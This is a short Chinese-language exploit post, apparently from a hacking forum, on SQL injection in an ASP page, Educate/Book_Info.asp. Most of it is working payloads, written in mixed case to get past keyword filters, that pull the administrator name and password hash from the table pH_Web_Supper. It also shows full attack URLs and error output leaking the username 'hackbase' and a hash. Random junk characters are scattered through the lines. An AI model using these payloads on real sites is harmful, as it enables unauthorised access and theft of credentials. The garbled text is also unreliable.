漏洞出现在Educate/Book_Info.asp4 R5 {9 g. b$ w
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出8 \$ k# O1 C* ]( E: @6 H5 b" g1 D- v
exp:如下0 E" E7 r% K, E$ A, V
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
* ^$ b$ T8 q9 U查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)9 ^3 {# _7 r2 N- w$ G5 i/ ~
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% r4 t1 o/ R$ R- N9 S1 u* M( yMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
8 w' n6 d) Q9 c5 Y0 D' W& l将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。% K% C9 N, n1 ^9 ~
/Educate/Book_Info.asp,行 8
" v/ }+ V5 M/ l3 M5 Jhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ B7 u$ K. ]8 B$ I6 D5 [# IMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'. v8 ~. B W( ^! Q9 G( V; p
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
7 i9 S5 C: [4 e4 _- A/Educate/Book_Info.asp,行 8 |